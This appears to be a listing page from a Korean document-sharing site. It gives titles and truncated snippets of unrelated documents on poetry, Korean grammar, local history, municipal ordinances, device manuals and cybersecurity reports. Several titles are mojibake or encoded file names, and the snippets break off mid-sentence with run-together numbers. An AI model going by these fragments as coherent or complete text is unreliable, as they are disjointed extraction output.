<C3D6C1BE5FBBF5B1B9BEEEBBFDC8B0B0DCBFEFC8A32831333031323120C3D6C1BEBABB292E687770> 우리 시의 향기 사랑하는 일과 닭고기를 씹는 일 최승자, 유 준 서울예술대학교 문예창작과 강사/문학평론가 한 숟갈의 밥, 한 방울의 눈물로 무엇을 채울 것인가, 밥을 눈물에 말아먹는다 한들. 그대가 아무리 나를 사랑한다 해도 혹은 내가 아무리 그대를 사랑한다 해도 나는 오늘의 닭고기를 씹어야 하고 나는 오늘의 눈물을 삼켜야 한다.

More information

초등국어에서 관용표현 지도 방안 연구

초등국어에서 관용표현 지도 방안 연구 80 < 관용 표현 인지도> 남 여 70 60 50 40 30 20 10 0 1 2 3 4 5 6 70 < 관용 표현 사용 정도> 남 여 60 50 40 30 20 10 0 4학년 가끔쓴다 써본적있다 전혀안쓴다 5학년 가끔쓴다 써본적있다 전혀안쓴다 6학년 가끔쓴다 써본적있다 전혀안쓴다 70 < 속담 인지도> 남 여 60 50 40 30 20 10 0 1 2

More information

6±Ç¸ñÂ÷

6±Ç¸ñÂ÷ 6 6 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 과천심상소학교 졸업증서(문헌번호 03-004) 일제강점기 과천초등학교의 유일한 한국인 교장이었던 맹준섭임을 알 수 있다.

More information

과 위 가 오는 경우에는 앞말 받침을 대표음으로 바꾼 [다가페]와 [흐귀 에]가 올바른 발음이 [안자서], [할튼], [업쓰므로], [절믐] 풀이 자음으로 끝나는 말인 앉- 과 핥-, 없-, 젊- 에 각각 모음으로 시작하는 형식형태소인 -아서, -은, -으므로, -음

과 위 가 오는 경우에는 앞말 받침을 대표음으로 바꾼 [다가페]와 [흐귀 에]가 올바른 발음이 [안자서], [할튼], [업쓰므로], [절믐] 풀이 자음으로 끝나는 말인 앉- 과 핥-, 없-, 젊- 에 각각 모음으로 시작하는 형식형태소인 -아서, -은, -으므로, -음 . 음운 [ㄱ] [국], [박], [부억], [안팍] 받침의 발음 [ㄷ] [곧], [믿], [낟], [빋], [옫], [갇따], [히읃] [ㅂ] [숩], [입], [무릅] [ㄴ],[ㄹ],[ㅁ],[ㅇ] [간], [말], [섬], [공] 찾아보기. 음절 끝소리 규칙 (p. 6) [ㄱ] [넉], [목], [삭] [ㄴ] [안따], [안꼬] [ㄹ] [외골], [할꼬]

More information

민주장정-노동운동(분권).indd

민주장정-노동운동(분권).indd 민주장정 100년, 광주 전남지역 사회운동 연구 노동운동사 정 호 기 농민운동 1 목 차 제1장 연구 배경과 방법 07 1. 문제제기 2. 기존 연구의 검토 3. 연구 대상의 특성과 변화 4. 연구 자료와 연구 방법 07 10 12 16 제2장 이승만 정부 시대의 노동조합운동 19 1. 이승만 정부의 노동정책과 대한노총 1) 노동 관련 법률들의 제정과 광주

More information

<C0CEBCE2BABB2D33C2F7BCF6C1A420B1B9BFAAC3D1BCAD203130B1C72E687770>

<C0CEBCE2BABB2D33C2F7BCF6C1A420B1B9BFAAC3D1BCAD203130B1C72E687770> 해제 면양행견일기 沔 陽 行 遣 日 記 이 자료는 한말의 개화파 관료, 김윤식 金 允 植 (1835~1922)이 충청도 면천 沔 川 에 유배하면서 동학농민혁명 시기에 전문 傳 聞 한 것을 일일이 기록한 일기책 이다. 수록한 부분은 속음청사 續 陰 晴 史 의 권 7로 내제 內 題 가 면양행견일기 沔 陽 行 遣 日 記 로 되어 있는 부분 가운데 계사년 癸 巳 年

More information

조선왕조 능 원 묘 기본 사료집 -부록 : 능 원 묘의 현대적 명칭표기 기준안 차 례 서 장 : 조선왕실의 능 원 묘 제도 11 제 1부 능 원 묘 기본 사료 Ⅰ. 능호( 陵 號 ) 및 묘호( 廟 號 )를 결정한 유래 1. 건원릉( 健 元 陵 ) 21 2. 정릉( 貞 陵 ) 22 3. 헌릉( 獻 陵 )

More information

E1-정답및풀이(1~24)ok

E1-정답및풀이(1~24)ok 초등 2 학년 1주 2 2주 7 3주 12 4주 17 부록` 국어 능력 인증 시험 22 1주 1. 느낌을 말해요 1 ⑴ ᄂ ⑵ ᄀ 1 8~13쪽 듣기 말하기/쓰기 1 ` 2 ` 3 참고 ` 4 5 5 5 ` 6 4 ` 7 참고 ` 8 일기 ` 9 5 10 1 11, 3 [1~3] 들려줄 내용 옛날 옛날, 깊은 산골짜기에 큰 호랑이 한 마리가 살고 있었습 이

More information

<32303132BDC3BAB8C1A4B1D4C6C75BC8A3BFDC303530395D2E687770>

<32303132BDC3BAB8C1A4B1D4C6C75BC8A3BFDC303530395D2E687770> 조 례 익산시 조례 제1220호 익산시 주민감사 청구에 관한 조례 일부개정조례 1 익산시 조례 제1221호 익산시 제안제도 운영조례 일부개정조례 3 익산시 조례 제1222호 익산시 시채에 관한 조례 폐지조례 12 익산시 조례 제1223호 익산시 시세 감면 조례 전부개정조례 13 익산시 조례 제1224호 익산시 행정기구설치조례 19 익산시 조례 제1225호 익산시

More information

<C1B6BCB1B4EBBCBCBDC3B1E2342DC3D6C1BE2E687770>

<C1B6BCB1B4EBBCBCBDC3B1E2342DC3D6C1BE2E687770> 권2 동경잡기 東京雜記 동경잡기 173 권2 불우 佛宇 영묘사(靈妙寺) 부(府)의 서쪽 5리(里)에 있다. 당 나라 정관(貞觀) 6년(632) 에 신라의 선덕왕(善德王)이 창건하였다. 불전(佛殿)은 3층인데 체제가 특이하다. 속설에 절터는 본래 큰 연못이었는데, 두두리(豆豆里) 사람들이 하룻밤 만에 메 우고 드디어 이 불전을 세웠다. 고 전한다. 지금은

More information

38--18--최우석.hwp

38--18--최우석.hwp 古 詩 源 < 顔 延 之 > 篇 譯 註 * 崔 宇 錫 1) 1. 序 文 2. 古 詩 源 < 顔 延 之 > 篇 譯 註 3. 結 語 1. 序 文 沈 德 潛 (1673-1769)의 字 는 確 士 이고 號 는 歸 愚 이다. 江 南 長 洲 (현재의 江 蘇 省 蘇 州 ) 사람으로 淸 代 聖 祖, 世 宗, 高 宗 삼대를 모두 거쳤다. 특히 시를 몹 시 좋아한

More information

교사용지도서_쓰기.hwp

교사용지도서_쓰기.hwp 1. 재미있는 글자 단원의 구성 의도 이 단원은 도비와 깨비가 길을 잃고 헤매다 글자 공부의 필요성을 느끼고 글자 공부를 하게 되는 것으로 시작된다. 자칫 지겨울 수 있는 쓰기 공부를 다양한 놀이 위주의 활동으로 구성하였고, 학습자 주변의 다양한 자료들을 활용함으로써 학습에 대한 흥미를 갖고 활동할 수 있게 하였다. 각 단계의 학습을 마칠 때마다 도깨비 연필을

More information

cls46-06(심우영).hwp

cls46-06(심우영).hwp 蘇 州 원림의 景 名 연구 * 用 典 한 경명을 중심으로 1)심우영 ** 목 차 Ⅰ. 서론 Ⅱ. 기존의 경명 命 名 法 Ⅲ. 귀납적 결과에 따른 경명 분류 1. 신화전설 역사고사 2. 文 辭, 詩 句 Ⅳ. 결론 Ⅰ. 서론 景 名 이란 景 觀 題 名 (경관에 붙인 이름) 의 준말로, 볼만한 경치 지구와 경치 지 점 그리고 경치 지구 내 세워진 인공물에 붙여진

More information

0429bodo.hwp

0429bodo.hwp 친일인명사전 수록대상자 명단 친일인명사전편찬위원회 ㄱ ㄴ ㄷ ㄹ ㅁ ㅂ ㅅ ㅇ ㅈ ㅊ ㅋ ㅌ ㅍ ㅎ 이 명단은 친일인명사전 수록대상자의 후손 또는 연고자로부터 이의신청을 받기 위해 작성 되었습니다. 이 인물정보를 무단 복사하여 유포하거나 인터넷을 통해 전 파하는일체의행위는법에저촉될수있습니다. 주요 훈포상 약어 1. 병합기념장 2. 대정대례기념장 3. 소화대례기념장

More information

伐)이라고 하였는데, 라자(羅字)는 나자(那字)로 쓰기도 하고 야자(耶字)로 쓰기도 한다. 또 서벌(徐伐)이라고도 한다. 세속에서 경자(京字)를 새겨 서벌(徐伐)이라고 한다. 이 때문에 또 사라(斯羅)라고 하기도 하고, 또 사로(斯盧)라고 하기도 한다. 재위 기간은 6

伐)이라고 하였는데, 라자(羅字)는 나자(那字)로 쓰기도 하고 야자(耶字)로 쓰기도 한다. 또 서벌(徐伐)이라고도 한다. 세속에서 경자(京字)를 새겨 서벌(徐伐)이라고 한다. 이 때문에 또 사라(斯羅)라고 하기도 하고, 또 사로(斯盧)라고 하기도 한다. 재위 기간은 6 동경잡기東京雜記 권1 진한기辰韓紀 경상도는 본래 진한(辰韓)의 땅인데, 뒤에 신라(新羅)의 소유가 되었다. 여지승 람(輿地勝覽) 에 나온다. 진한은 마한(馬韓)의 동쪽에 있다. 스스로 말하기를, 망 명한 진(秦)나라 사람이 난리를 피하여 한(韓)으로 들어오니 한이 동쪽 경계를 분할 하여 주었으므로 성책(城栅)을 세웠다. 하였다. 그 언어가 진나라 사람과 비슷하다.

More information

時 習 說 ) 5), 원호설( 元 昊 說 ) 6) 등이 있다. 7) 이 가운데 임제설에 동의하는바, 상세한 논의는 황패강의 논의로 미루나 그의 논의에 논거로서 빠져 있는 부분을 보강하여 임제설에 대한 변증( 辨 證 )을 덧붙이고자 한다. 우선, 다음의 인용문을 보도록

時 習 說 ) 5), 원호설( 元 昊 說 ) 6) 등이 있다. 7) 이 가운데 임제설에 동의하는바, 상세한 논의는 황패강의 논의로 미루나 그의 논의에 논거로서 빠져 있는 부분을 보강하여 임제설에 대한 변증( 辨 證 )을 덧붙이고자 한다. 우선, 다음의 인용문을 보도록 과 임제 신해진(전남대) 1. 머리말 세조의 왕위찬탈과 단종복위 과정에서의 사육신을 소재로 한 작품은 남효온( 南 孝 溫 )의 (1492년 직전?), 임제( 林 悌 )의 (1576?), 김수민( 金 壽 民 )의 (1757) 등이 있다. 1) 첫 작품은 집전( 集

More information

71호 한소리.indd

71호 한소리.indd 제71호 2011.11.3 전국언론노동조합 한겨레신문지부 한겨레신문 우리사주조합 (우)121-750 서울 마포구 공덕동 116-25 발행인_전종휘/ 편집인_길윤형 / 편집_김소민 본사광고 벌써 찬바람 종편 한파 가시화 10월 목표대비 84.7% 그쳐 작년 비해 5.3%p 하락 종편 잇단 판매설명회 등 영향 SBS MBC도 채비 언론노조, `1공영 1민영' 채택하고

More information

<BDC5C7E0C1A4BCF6B5B5C6AFC0A72DBEF7B9ABBAB8B0ED2E687770>

<BDC5C7E0C1A4BCF6B5B5C6AFC0A72DBEF7B9ABBAB8B0ED2E687770> 2 0 0 5. 3. 1 4 ( 月 ) 新 行 政 首 都 建 設 支 援 特 別 委 員 會 報 告 行 政 中 心 複 合 都 市 特 別 法 國 會 通 過 에 따른 그간의 推 進 狀 況 과 向 後 推 進 計 劃 新 行 政 首 都 建 設 推 進 支 援 團 報 告 順 序 Ⅰ. 그동안 우리 道 의 主 張 과 國 會 通 過 結 果 ꊱ 우리 道 가 일관되게 主 張 해 온

More information

사용 설명서 이용 안내 사용 설명서의 내용은 제품의 펌웨어 버전에 따라 사용자에게 통보 없이 일부 변경될 수 사용 설명서는 Windows XP 환경을 기준으로 설명하고 있으며 사용자의 OS 환경에 따라 다소 차이가 있을 수 제품에 사용된 음원, Wallpaper, 이미

사용 설명서 이용 안내 사용 설명서의 내용은 제품의 펌웨어 버전에 따라 사용자에게 통보 없이 일부 변경될 수 사용 설명서는 Windows XP 환경을 기준으로 설명하고 있으며 사용자의 OS 환경에 따라 다소 차이가 있을 수 제품에 사용된 음원, Wallpaper, 이미 안전을 위한 주의사항(3쪽) 사용자의 안전과 재산상의 손해 등을 막기 위한 내용입니다. 반드시 읽고 올바르게 사용해 주세요. 사용 설명서의 그림과 화면은 실물과 다를 수 사용 설명서 이용 안내 사용 설명서의 내용은 제품의 펌웨어 버전에 따라 사용자에게 통보 없이 일부 변경될 수 사용 설명서는 Windows XP 환경을 기준으로 설명하고 있으며 사용자의 OS

More information

Scene7 Media Portal 사용

Scene7 Media Portal 사용 ADOBE SCENE7 MEDIA PORTAL http://help.adobe.com/ko_kr/legalnotices/index.html. iii 1 : Media Portal..................................................................................................................

More information

(최종) 주안도서관 소식지_7호.indd

(최종) 주안도서관 소식지_7호.indd 문화! 지식! 비전! in 주안도서관 책으로 만나는 북 News Letter Vol. 7 일곱번째 호 _ 2014.09 Contents 02 04 06 09 미디어가 권하는 책 도서관 가까이 들여다보기 함께 소통하는 도서관 - 주안도서관 독서동아리 책보고( 寶 庫 ) 책이 가득한 보물창고 일반자료실, 어린이열람실 추천도서 서가 속 책, 세상과 다시 만나다 아빠가

More information

K-ICT 클라우드 서비스 적용 시범사업 -창원국가산업단지 입주기업대상- Partner for New Possibilities 모든 사람과 기업들이 꿈을 실현하고 더 나은 세상을 위한 새로운 가능성을 만들어 갈 때 SK텔레콤이 항상 그들과 함께하는 동반자가 되겠다는 의미입니다. 가능성의 릴레이 사람에서 기술로, 다시 사람으로 가능성의 릴레이는 고객의 삶 속에서

More information

월간 2016. 02 CONTENTS 3 EXPERT COLUMN 영화 오블리비언과 C&C 서버 4 PRODUCT ISSUE 안랩, 새로워진 'V3 모바일 시큐리티' 출시 고도화되는 모바일 위협, 해답은? 6 SPECIAL REPORT 유포 방법에서 예방까지 모바일 랜

월간 2016. 02 CONTENTS 3 EXPERT COLUMN 영화 오블리비언과 C&C 서버 4 PRODUCT ISSUE 안랩, 새로워진 'V3 모바일 시큐리티' 출시 고도화되는 모바일 위협, 해답은? 6 SPECIAL REPORT 유포 방법에서 예방까지 모바일 랜 안랩 온라인 보안 매거진 2016. 02 Mobile Security 월간 2016. 02 CONTENTS 3 EXPERT COLUMN 영화 오블리비언과 C&C 서버 4 PRODUCT ISSUE 안랩, 새로워진 'V3 모바일 시큐리티' 출시 고도화되는 모바일 위협, 해답은? 6 SPECIAL REPORT 유포 방법에서 예방까지 모바일 랜섬웨어의 모든 것 모바일까지

More information

기업은행현황-표지-5도

기업은행현황-표지-5도 2 0 5 2005 Total Financial Network Bank Industrial Bank of Korea Contents 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45

More information

VISION2009사업계획(v5.0)-3월5일 토론용 초안.hwp

VISION2009사업계획(v5.0)-3월5일 토론용 초안.hwp VISION 2009-1 - 2009년 전망 [1] 경제 전망 경제 위기 계속 -각종 연구소 2009년 경제성장률 전망치 하향 조정, 마이너스 성장 예상 -주요 기업들 감산 및 구조조정, 중소기업 부도 -실업 증가, 비정규직 증가, 내수부진으로 인한 자영업 몰락 2009년은 경제위기가 정세전망을 원천적으로 규정하는 상수. 이를 둘러싸고 정 치사회의 공방이 진행.

More information

4 꼬부랑 이라는 말이 재미있습니다. 5같은 말이 반복이 되어서 지루합니다. 4 꼬부랑 은 굽은 모양을 재미있게 흉내 낸 말입니다. 꼬부랑 을 빼고 읽는 것보다 넣어서 읽 으면 할머니와 엿가락, 강아지의 느낌이 좀 더 실감 나서 재미가 있습니다. 국어2(예습) / 1.

4 꼬부랑 이라는 말이 재미있습니다. 5같은 말이 반복이 되어서 지루합니다. 4 꼬부랑 은 굽은 모양을 재미있게 흉내 낸 말입니다. 꼬부랑 을 빼고 읽는 것보다 넣어서 읽 으면 할머니와 엿가락, 강아지의 느낌이 좀 더 실감 나서 재미가 있습니다. 국어2(예습) / 1. 2016년 1월 2학년 시간표 < > 1주차_[국어] 국어1(예습) / 1. 아, 재미있구나! / 01월 04일 3. 다음은 꼬부랑 을 넣은 것과 뺀 것입니다. 그 느낌을 설명한 것으로 알맞지 않은 것은 무엇입 니까? 1에서 꼬부랑 할머니 는 허리가 굽은 할머니의 모습이 떠오릅니다. 2에서 꼬부랑 고갯길 은 그냥 고갯길 보다 더 많이 굽은 고갯길 같습니다.

More information

Microsoft Word - UG-BetaDraft_KO_TT-OK.doc

Microsoft Word - UG-BetaDraft_KO_TT-OK.doc DocuPrint C2090 FS 사용설명서 Adobe, Adobe 로고, Acrobat Reader는 Adobe Systems Incorporated의 상표입니다. Microsoft, Windows, Windows Server는 미국 및/또는 다른 나라의 Microsoft Corporation의 등록상표 또 는 상표입니다. 소프트웨어 스크린 샷을 사용하는

More information

CONTENTS 새로운 세계를 개척하다_ 2012 Vol. 56 DAPA Gallery 04 CEO에게 듣다 방위사업도 특허전쟁에 대비하자 06 Focus on 2012군용항공기 감항인증 국제컨퍼런스 외 08 Policy in 명백한 증거확보를 통한 부당이득금 국고환수

CONTENTS 새로운 세계를 개척하다_ 2012 Vol. 56 DAPA Gallery 04 CEO에게 듣다 방위사업도 특허전쟁에 대비하자 06 Focus on 2012군용항공기 감항인증 국제컨퍼런스 외 08 Policy in 명백한 증거확보를 통한 부당이득금 국고환수 OUTREACH 2012. 10+11. Vol.56 RETRO CONTENTS 새로운 세계를 개척하다_ 2012 Vol. 56 DAPA Gallery 04 CEO에게 듣다 방위사업도 특허전쟁에 대비하자 06 Focus on 2012군용항공기 감항인증 국제컨퍼런스 외 08 Policy in 명백한 증거확보를 통한 부당이득금 국고환수 12 DQ(Defense Quality)마크

More information

P2WW-2642-01HNZ0

P2WW-2642-01HNZ0 P2WW-2642-01HNZ0 CardMinder 유저 가이드 시작하기 전에 CardMinder 는 이미지 스캐너를 사용하여 명함을 스캔하거나 주소 데이터 베이스로 변환시키 는 애플리케이션입니다. 이 매뉴얼에는 CardMinder 의 기능 및 창에 대한 자세한 설명 및 개요를 설명합니다. 본 매뉴얼을 표시하거나 인쇄하려면, Adobe Acrobat (7.0

More information

요 약 문 1. 제목 : 개인정보 오남용 유출 2차 피해 최소화 방안 2. 연구의 배경 개인정보란 살아 있는 개인에 관한 정보로서 개인을 알아볼 수 있는 정보로 해당 정보만으로는 특정 개인을 알아볼 수 없더라도 다른 정보와 쉽게 결합하여 알아볼 수 있는 것을 포함한다.

요 약 문 1. 제목 : 개인정보 오남용 유출 2차 피해 최소화 방안 2. 연구의 배경 개인정보란 살아 있는 개인에 관한 정보로서 개인을 알아볼 수 있는 정보로 해당 정보만으로는 특정 개인을 알아볼 수 없더라도 다른 정보와 쉽게 결합하여 알아볼 수 있는 것을 포함한다. 개인정보 오남용 유출 2차 피해 최소화 방안 최종보고서 수행기관 : 숭실대학교 산학협력단 2015. 10. 요 약 문 1. 제목 : 개인정보 오남용 유출 2차 피해 최소화 방안 2. 연구의 배경 개인정보란 살아 있는 개인에 관한 정보로서 개인을 알아볼 수 있는 정보로 해당 정보만으로는 특정 개인을 알아볼 수 없더라도 다른 정보와 쉽게 결합하여 알아볼 수 있는

More information

uFOCS

uFOCS 1 기 : 기 UF_D_V250_002 기 기 기 품 ufocs 기 v2.5.0 히기기기기기기기기기 기 Manual 기 version 기 3.2 기품 2011.7.29 히기 345-13 1 Tel : 02-857-3051 Fax : 02-3142-0319 : http://www.satu.co.kr 2010 SAT information Co., Ltd. All

More information

2 사용하기 전에 안전을 위한 주의사항 1 사용하기 전에 주의사항은 경고 와 주의 의 두 가지로 구분되어 있으며, 의미는 다음과 같습니다. >: 이 그림 기호는 위험을 끼칠 우려가 있는 사항과 조작에 대하여 주의를 환기시키기 위한 기호입니다. 이 기호가 있는 부분은 위

2 사용하기 전에 안전을 위한 주의사항 1 사용하기 전에 주의사항은 경고 와 주의 의 두 가지로 구분되어 있으며, 의미는 다음과 같습니다. >: 이 그림 기호는 위험을 끼칠 우려가 있는 사항과 조작에 대하여 주의를 환기시키기 위한 기호입니다. 이 기호가 있는 부분은 위 LG 스마트 오디오 모델명 : NP8740 NP8540 한국어 사용설명서 사용 전에 안전을 위한 주의사항을 반드시 읽고 정확하게 사용하세요. 2 사용하기 전에 안전을 위한 주의사항 1 사용하기 전에 주의사항은 경고 와 주의 의 두 가지로 구분되어 있으며, 의미는 다음과 같습니다. >: 이 그림 기호는 위험을 끼칠 우려가 있는 사항과 조작에 대하여 주의를 환기시키기

More information

ESET Cyber Security Pro

ESET Cyber Security Pro : OS X ( 6.0 ) ESET, spol. s r.o. ESET Cyber Security Pro ESET, spol. s r.o. www.eset.com All rights reserved.,,,,, ESET, spol. s r.o. : www.eset.com/support REV. 6/16/2016 1. ESET...4 Cyber Security Pro

More information

민변_보도자료_특조위_예산_미편성_헌법소원_및_공.hwp

민변_보도자료_특조위_예산_미편성_헌법소원_및_공.hwp 1 - 서울 서초구 법원로4길 23 양지빌딩 2층 전화 02) 522-7284, 팩스 02)522-7285 웹페이지 http://minbyun.org 전자우편 admin@minbyun.or.kr 문서번호 : 수 신 : 언론사 제위 발 신 : 민주사회를 위한 변호사모임 (담당 : 조영관 변호사 010-8848 - 7828) 제 목 [보도자료][세월호TF] 기획재정부장관의

More information

빅데이터를 통해 세상을 읽는다 부산광역시 해운대구 김혜정 해운대 관광? 빅데이터에 물어봐! 전국 최초로 빅데이터 분석팀을 신설해 수준 높은 서비스 제공과 과학적 예측 행정을 구현하고 있는 해운대구의 참신한 도전기. 해운대를 찾아오는 국내외 수많은 관광객들에게 즐거운 추

빅데이터를 통해 세상을 읽는다 부산광역시 해운대구 김혜정 해운대 관광? 빅데이터에 물어봐! 전국 최초로 빅데이터 분석팀을 신설해 수준 높은 서비스 제공과 과학적 예측 행정을 구현하고 있는 해운대구의 참신한 도전기. 해운대를 찾아오는 국내외 수많은 관광객들에게 즐거운 추 t h e second chapter 스마트폰, SNS, 클라우드 컴퓨팅 등 디지털 멀티미디어 기술을 바탕으로 부서 간 정보를 공유하고 운영 시스템을 연계해 불필요한 예산을 줄이고 행정 품질을 제고합니다. 팔방미인 정부3.0! 또 지자체 및 관계기관의 소통과 협업을 통해 지역의 오랜 난제를 해결하고 과학적 예측과 신뢰를 기반으로 한 빅데이터를 활용해 지역 관광

More information

1. GigE Camera Interface를 위한 최소 PC 사양 CPU : Intel Core 2 Duo, 2.4GHz이상 RAM : 2GB 이상 LANcard : Intel PRO/1000xT 이상 VGA : PCI x 16, VRAM DDR2 RAM 256MB

1. GigE Camera Interface를 위한 최소 PC 사양 CPU : Intel Core 2 Duo, 2.4GHz이상 RAM : 2GB 이상 LANcard : Intel PRO/1000xT 이상 VGA : PCI x 16, VRAM DDR2 RAM 256MB Revision 1.0 Date 11th Nov. 2013 Description Established. Page Page 1 of 9 1. GigE Camera Interface를 위한 최소 PC 사양 CPU : Intel Core 2 Duo, 2.4GHz이상 RAM : 2GB 이상 LANcard : Intel PRO/1000xT 이상 VGA : PCI x

More information

<요 약> 1. 법ㆍ제도 동향 - 정부의 개인정보 관리 집중점검에 중소기업 불안 - 개인정보보호, 전담기구 세워 통합 관리 2. 보안위협 동향 - 앱 취약점을 이용한 악성코드 1위 지속 - Windows XP 지원 종료 '후폭풍' 3. 업계 동향 - 수 조원 영업이익

<요 약> 1. 법ㆍ제도 동향 - 정부의 개인정보 관리 집중점검에 중소기업 불안 - 개인정보보호, 전담기구 세워 통합 관리 2. 보안위협 동향 - 앱 취약점을 이용한 악성코드 1위 지속 - Windows XP 지원 종료 '후폭풍' 3. 업계 동향 - 수 조원 영업이익 2014년 3월 10일 (제14호) 1. 법ㆍ제도 동향 2. 보안위협 동향 3. 업계 동향 4. 기술 동향 5. 고객구축 사례 기획팀 기술기획팀 보안서비스개발팀 고객서비스팀 - 1 - 1. 법ㆍ제도 동향 - 정부의 개인정보 관리 집중점검에 중소기업 불안 - 개인정보보호, 전담기구 세워 통합 관리 2. 보안위협 동향 - 앱 취약점을 이용한

More information

[그림 2] 페이팔의 사업구조 자료: 산업은행, 한국투자증권 페이팔(Paypal) 그리고 알리페이(Alipay) 국내 결제 시장의 향후 변화, 해외 사례로 쉽게 유추 가능 국내 결제 시장에서 어떤 변화가 시도되고 있는지는 해외의 사례를 살펴보면, 비교적 쉽게 알 수 있

[그림 2] 페이팔의 사업구조 자료: 산업은행, 한국투자증권 페이팔(Paypal) 그리고 알리페이(Alipay) 국내 결제 시장의 향후 변화, 해외 사례로 쉽게 유추 가능 국내 결제 시장에서 어떤 변화가 시도되고 있는지는 해외의 사례를 살펴보면, 비교적 쉽게 알 수 있 박혜진 (hspark@truefriend.com) 02-3276-5993 카카오페이와 라인페이: 결제 시장의 변화 2014년 Target KOSPI 2,070pt 12MF PER 9.82배 12MF PBR 0.95배 Yield Gap 7.9%P 카카오페이와 라인페이 출시, 규제 완화 등 국내에서도 간편결제 서비스 활성화 움직임 알리페이(Alipay)의 사례

More information

목차 개요 3 섹션 1: 해결 과제 4 APT(지능형 지속 위협): 이전과 다른 위협 섹션 2: 기회 7 심층 방어 섹션 3: 이점 14 위험 감소 섹션 4: 결론 14 섹션 5: 참조 자료 15 섹션 6: 저자 소개 16 2

목차 개요 3 섹션 1: 해결 과제 4 APT(지능형 지속 위협): 이전과 다른 위협 섹션 2: 기회 7 심층 방어 섹션 3: 이점 14 위험 감소 섹션 4: 결론 14 섹션 5: 참조 자료 15 섹션 6: 저자 소개 16 2 백서 표적 공격 2012년 7월 APT(지능형 지속 위협) 차단을 위한 전면적인 철저한 방어 Russell Miller CA Technologies 보안 관리 사업부 agility made possible 목차 개요 3 섹션 1: 해결 과제 4 APT(지능형 지속 위협): 이전과 다른 위협 섹션 2: 기회 7 심층 방어 섹션 3: 이점 14 위험 감소 섹션

More information

정치

정치 2015 Busan University Students Value Research 2015 부산지역 대학생 가치관 조사 부산청년정책센터 공동기획 여론조사전문기관 (주)폴리컴 후원 2015 부산지역 대학생 가치관 조사 본 조사는 부산청년정책센터와 KNN, 부산일보와 공동기획 프로젝트이며, 여론조사전문기관인 (주)폴리컴에서 실행하고 있습니다. 또한, 본 조사는

More information

<49534F20323030303020C0CEC1F520BBE7C8C4BDC9BBE720C4C1BCB3C6C320B9D7204954534D20BDC3BDBAC5DB20B0EDB5B5C8AD20C1A6BEC8BFE4C3BBBCAD2E687770>

<49534F20323030303020C0CEC1F520BBE7C8C4BDC9BBE720C4C1BCB3C6C320B9D7204954534D20BDC3BDBAC5DB20B0EDB5B5C8AD20C1A6BEC8BFE4C3BBBCAD2E687770> ISO 20000 인증 사후심사 컨설팅 및 ITSM 시스템 고도화를 위한 제 안 요 청 서 2008. 6. 한 국 학 술 진 흥 재 단 이 자료는 한국학술진흥재단 제안서 작성이외의 목적으로 복제, 전달 및 사용을 금함 목 차 Ⅰ. 사업개요 1 1. 사업명 1 2. 추진배경 1 3. 목적 1 4. 사업내용 2 5. 기대효과 2 Ⅱ. 사업추진계획 4 1. 추진체계

More information

Microsoft Word - 베스트로 2012년 05월.doc

Microsoft Word - 베스트로 2012년 05월.doc 2 0 1 2 [NEWS] 2012년 4월 주요이슈 [ISSUE] 5.10 대책, 효과와 전망 [SPECIAL] 요즘 뜨는 단독주택 마을 [INVESTMENT] 초기 비용 부담을 낮춰라 [MARKET] 5월 새 아파트 공급시장 동향과 투자 전략 05 U차 례 Ⅰ NEWS 01. 2012년 4월 주요이슈 Ⅱ ISSUE 5.10 대책,

More information

partprime_intro.key

partprime_intro.key YOU CAN FLY TO THE SMART AREA INTRODUCTION PartPrime Inc. CONTENTS / GS HYNIX KERIS MDMS S-OIL BONUS CARD SMARTWORKS GS KIXXHUB GS,, POS VAN (MS, IC ) POS MDM MDM KERIS PC to Mobile Mobile to Mobile

More information

Mac OS X 이란.hwp

Mac OS X 이란.hwp Mac OS X 이란 운영체제(OS:Operation System)는 컴퓨터를 제어하고 해야 할 일을 명령하는 소프트웨어입 니다. 애플의 매킨토시(Macintosh) 컴퓨터를 실행하는 운영 체제는 Mac OS라고 불립니다. 이미 윈도우즈에 적응되어버린 사용자들이 다시 새로운 OS를 배운다는 건 쉽지 않겠지만, Mac OS는 세상의 어떤 OS보다도 사용하기 쉽다고

More information

<B9E9BCAD31B1C72DC0DBBEF72D32B1B32E687770>

<B9E9BCAD31B1C72DC0DBBEF72D32B1B32E687770> 사법제도개혁추진위원회 백서 (상) 발 간 사 2005. 1. 출범한 사법제도개혁추진위원회가 그 소임을 다하고 2년 동안의 활동을 마치면서 그 동안의 성과를 담은 백서를 출간하게 된 것을 진심으로 기쁘고 보람된 일로 생각합니다. 정부 수립 이후 우리의 사법제도에 변화와 발전이 없었던 것은 아니나 그 기본적인 틀은 반세기가 지나도록 적지 않은 문제점과 한계를 내포한

More information